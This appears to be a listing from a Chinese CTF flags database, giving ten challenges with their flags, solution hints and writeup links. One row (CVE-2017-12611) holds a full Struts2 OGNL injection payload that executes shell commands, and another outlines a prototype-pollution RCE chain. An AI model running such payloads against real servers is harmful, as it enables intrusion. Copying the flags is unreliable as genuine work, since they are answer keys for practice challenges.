随波逐流信息安全网 www.1o1o.xyz

   [随波逐流]CTF Flags

软件版本:v1.0.0   数据版本: v20260526
序号 Website Type Title Value Writeup Competition Id
1 ctfshow WEB.渔人杯 飘啊飘 ctfshow{访问时修改User-Agent为Android并访问/mb.html} https://blog.csdn.net/m0_63641882/art... 渔人杯 3961
2 BUUCTF Pwn [极客大挑战 2019]Not Bad 成功利用ORW方式获取flag https://blog.csdn.net/mcmuyanga/artic... 极客大挑战 2019 7946
3 xuenixiang.com Reverse 青青子衿 - https://www.xuenixiang.com/forum.php?... 看雪题库 15521
4 bugku PWN 烧烤摊 验证后的网址 flag{90d2436c-9ee5-4473-b363-f... CISCN2023 2279
5 春秋云境 WEB CVE-2017-12611 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cat /flag').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} https://cloud.tencent.com/developer/a... 春秋云境 14762
6 ctfshow _新手必刷_菜狗杯 横空出世 ctfshow{2016年2月25日_老特拉福德球场} ... - 4768
7 bugku MISC 半决赛-加密的通道 flag{844dfc86da23a4d5283907efaf9791ad} https://blog.csdn.net/ZXW_NUDT/articl... 蓝帽杯2022 1409
8 BUUCTF DASBOOK [第八章][8.2.5 明文攻击]plain 已知明文攻击 https://blog.csdn.net/weixin_45595929... 第八章 7790
9 BUUCTF Web [XNUCA2019Qualifier]HardJS 利用Node.js原型链污染漏洞(CVE-2019-10744)通过lodash.defaultsDeep合并消息时污染Object.prototype,结合EJS模板引擎的outputFunctionName或escapeFunction属性触发RCE,最终通过构造恶意JSON消息实现远程代码执行获取flag。 https://www.anquanke.com/post/id/185377 XNUCA2019Qualifier 7757
10 bugku WEB Baby Web flag{very_baby_web} https://cloud.tencent.com/developer/a... greyctf2023quals 2166